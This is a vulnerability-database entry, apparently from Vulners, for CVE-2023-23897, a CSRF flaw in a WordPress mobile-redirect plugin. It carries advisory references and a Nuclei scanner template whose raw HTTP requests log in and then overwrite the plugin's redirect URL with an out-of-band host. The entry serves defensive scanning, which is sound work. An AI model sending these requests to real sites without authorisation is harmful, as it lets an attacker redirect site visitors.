| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| The vulnerability of the Simple Mobile URL Redirect Plugin in the WordPress content management system allows a hacker to perform a CSRF attack. | 27 Feb 202400:00 | – | bdu_fstec | |
| CVE-2023-23897 | 30 Jan 202401:35 | – | circl | |
| Wrodpress Plugin Simple Mobile URL Redirect 跨站请求伪造漏洞 | 10 Jul 202300:00 | – | cnnvd | |
| CVE-2023-23897 | 10 Jul 202312:14 | – | cve | |
| CVE-2023-23897 WordPress Simple Mobile URL Redirect Plugin <= 1.7.2 is vulnerable to Cross Site Request Forgery (CSRF) | 10 Jul 202312:14 | – | cvelist | |
| EUVD-2023-27980 | 3 Oct 202520:07 | – | euvd | |
| CVE-2023-23897 | 10 Jul 202316:15 | – | nvd | |
| CVE-2023-23897 | 10 Jul 202316:15 | – | osv | |
| WordPress Simple Mobile URL Redirect Plugin <= 1.7.2 is vulnerable to Cross Site Request Forgery (CSRF) | 20 Mar 202300:00 | – | patchstack | |
| Cross site request forgery (csrf) | 10 Jul 202316:15 | – | prion |
id: CVE-2023-23897
info:
name: Ozette Plugins - Cross-Site Request Forgery
author: popcorn94
severity: medium
description: |
An attacker can update, create, and remove the site's mobile redirects via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
impact: |
Attackers can perform unauthorized actions on behalf of authenticated users, potentially leading to data manipulation or unauthorized redirects.
remediation: |
Update to version 1.7.3 or later with CSRF protections implemented.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-mobile-url-redirect/simple-mobile-url-redirect-172-cross-site-request-forgery-leading-to-mobile-redirect-updates
- https://nvd.nist.gov/vuln/detail/CVE-2023-23897
- https://patchstack.com/database/vulnerability/simple-mobile-url-redirect/wordpress-simple-mobile-url-redirect-plugin-1-7-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2023-23897
cwe-id: CWE-352
epss-score: 0.01671
epss-percentile: 0.73989
cpe: cpe:2.3:a:ozette:simple_mobile_url_redirect:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: ozette
product: simple_mobile_url_redirect
framework: wordpress
shodan-query: html:"simple-mobile-url-redirect"
tags: cve,cve2023,wordpress,wp,plugins,ozette,csrf,vuln,authenticated,vkev,simple-mobile-url-redirect
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "wordpress_logged_in")
condition: and
internal: true
- raw:
- |
POST /wp-admin/options-general.php?page=simple-mobile-url-redirect-1.7%2Fmobile-redirect.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
mobiletoggle=&mobileurl=oast.pro&mobilemode=301&mobileredirectoncedays=7&submit=Save+Changes
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "Updated", "<div class=\"updated\">", "id=\"mobileurl\" value=\"http://oast.pro\"")'
condition: and
# digest: 4a0a004730450220729450e0c5ecfe849a41746e239932293d5545ba068521676de350f5732e90ff022100c93da21c7eda749f308224d89efdd95662559e6149122d25f3f9b0f2077f138a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation